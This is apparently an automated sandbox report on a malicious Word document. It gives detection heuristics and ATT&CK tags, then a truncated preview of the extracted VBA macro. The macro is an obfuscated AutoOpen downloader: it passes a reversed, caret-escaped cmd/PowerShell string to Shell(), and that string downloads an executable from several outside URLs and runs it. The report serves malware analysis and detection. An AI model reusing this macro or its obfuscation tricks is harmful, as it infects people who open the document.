MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. This macro utilizes the Shell() function to execute a command-line instruction. The script attempts to construct a command that appears to be setting an environment variable, likely as part of a multi-stage download and execution process. The presence of the Shell() call and the obfuscated command construction strongly indicate a downloader or droppper functionality.
Heuristics 6
-
ClamAV: Doc.Malware.Generic-6691326-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6691326-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4906 bytes |
SHA-256: d61e885ff4bc54ef0ddf03809ef698c0d86ece1ab80baf1eddf1371c06985986 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "LiaUosZFwXaV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
Set muMFWr = XaJIN
Set rBlmW = hudFCH
Shell RYLvMuUX + GMsntZKknk + zojcWRp + dOqQECm + FjBSVMqkZpWDq + TdcOapTqRGFzjz, Format(0)
Set CziEbL = mIAQLz
End Sub
Attribute VB_Name = "qujmYfqwCmpk"
Function RYLvMuUX()
On _
Error _
Resume _
Next
Set OMEvnl = TWmzwO
uzMvii = Format(Chr(0 + 15 + 8 + 7 + 69)) + "md /V" + "^" + ":^O/" + Format(Chr(0 + 10 + 5 + 5 + 47)) + Format(Chr(0 + 4 + 2 + 2 + 26)) + "^" + "se^t " + "8^L=^ ^" + " ^ ^"
Set ZisRJ = aRVjm
Set zfszJc = LKUhj
Set GUqUsS = cQHzpz
siPsLcVJkhr = " ^ ^" + " " + "^ ^" + " ^ " + " " + " }^" + "}^" + "{h" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^t^" + "a" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "};ka" + "erb^;V" + "f^X"
Set GHDrwE = zIohUk
Set JwKhV = Iiszi
Set TDQpqj = FuMwAW
Set AUdjAl = pOUJjC
iizbcjBOrF = "$^ ^" + "met^I" + "-eko" + "vn^" + "I^;)"
Set zdLrSp = ibnGki
Set jAajF = pwfSj
Set VsTQE = tLLVV
OcVimMaZqv = "V^fX$^ " + "^,BUI^" + "$(el" + "^i^F^d^" + "a^o" + "^l" + "nwo" + "^D^.^I" + "v^d^$"
Set EMjajN = sdUvjK
Set ItkXVF = AAART
Set SsADr = lYjZEI
Set fFkiI = koAqk
zOdjiHN = "{^yr" + "t{)MW" + "^Z^" + "$^ n^i^" + " ^B^"
Set JTCtjL = zVvLc
jCJbud = "U" + "I$(^h" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "aer" + "o^f^;" + "^'^ex" + "^" + "e^.'"
Set uwUzfG = MUowM
Set StWOl = chQLb
WkGjODE = "^+^d" + "Dj^$+" + "^'^\^" + "'" + "+" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "il^b^u" + "p^:" + "vn^e" + "^$=Vf^" + "X^$;^'" + "22" + "1^'"
RYLvMuUX = uzMvii + siPsLcVJkhr + iizbcjBOrF + OcVimMaZqv + zOdjiHN + jCJbud + WkGjODE
Set cKdGO = GSziz
Set GhFkz = ZCBoO
End Function
Function GMsntZKknk()
On _
Error _
Resume _
Next
Set MaVOq = ztlqIZ
Set MhIWZ = qkKLp
Set TzurO = HVzLbb
jkPpbdkj = "^ ^=" + " d^Dj" + "^$;" + ")'" + "@'(t^i^" + "l" + "^p^S" + "^.^'K"
Set Djpbu = cRfYjN
Set XuvCC = DHwzQ
Set NVhvqs = JowwJU
mihshOcdQG = "^ml^e^0" + "J^E/mo" + Format(Chr(0 + 15 + 8 + 7 + 69)) + ".s^e" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "n^e^te" + "pm^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^" + "e^dn^a" + "lib" + "u^dgo^" + "lb^e^" + "l//^:pt" + "^th^@2^" + "O^D^ab/" + "^ta"
Set BWKiU = QhZpMs
Set XHuMlt = jfzjU
Set OZTIj = JMiji
Set zwthho = NKpZs
mcwrHtfn = "^" + ".^w^" + "o" + "nsd^i^" + "k.ww^w/" + "/" + "^:^" + "ptt^h@^" + "W^" + "eUH^9/a" + "u^.m^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^." + "v^e^i^k"
Set SqKwzb = cpuvz
Set jiszOb = Mcisf
Set kuQvL = qYCNW
Set XDVop = qCuMG
WQZbb = "g^o" + "^l^ot^e" + "m^so^" + "k//" + ":^pt" + "^t^h" + "^@" + "RvE" + "EQ^z" + "/m^o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + ".n^a^h" + "^a^pe^s" + "^t"
Set phJEb = zNDNuM
Set IZqCWJ = BNsPf
tBHudrF = "anas" + "ars^" + "ak//:" + "ptt^h^" + "@71/^m" + "o" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "^.gn"
Set Rovjl = zsXcMi
Set zqYcwN = YBPauc
Set FUWkaz = ltLzj
Set lTOQiT = BciLi
CUjwqCwitZC = "ip" + "^" + "uor^" + "g" + "-^" + "l^i" + "^" + "a^m//^:"
GMsntZKknk = jkPpbdkj + mihshOcdQG + mcwrHtfn + WQZbb + tBHudrF + CUjwqCwitZC
Set JqFtBj = UWBSt
Set hKWkc = LiWLB
Set YsMtUE = Nvoqs
Set DwYQDm = ijars
End Function
Function zojcWRp()
On _
Error _
Resume _
Next
Set UtrvDO = kzrbq
Set JlCbRj = EjzrM
Set aWzKLw = ZDHQX
isYihVzBX = "^" + "ptt^h^" + "'=^MWZ" + "$;^tnei" + "^"
Set iUrYz = OzqrbV
Set BWabC = fibht
Set YsQhcE = Nqujok
Set LtPZjp = vITYp
Set wHOEO = GIZpPm
aXYaXdwNBOa = "l" + Format(Chr(0 + 10 + 5 + 5 + 47)) + "b" + "e^W.te" + "N^ ^" + "t" + Format(Chr(0 + 15 + 8 + 7 + 69)) + "e" + "^j" + "^b^" + "o-w" + "en=" + "^Iv^d$" + " l^leh^" + "srewo" + "^p&&^f^" + "or "
Set bhKozW = iDjid
Set DXwOI = ulswn
Set AsKfLL = sbmMt
AVnjhq = "/^L %^p" + " ^in " + "(3^8
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.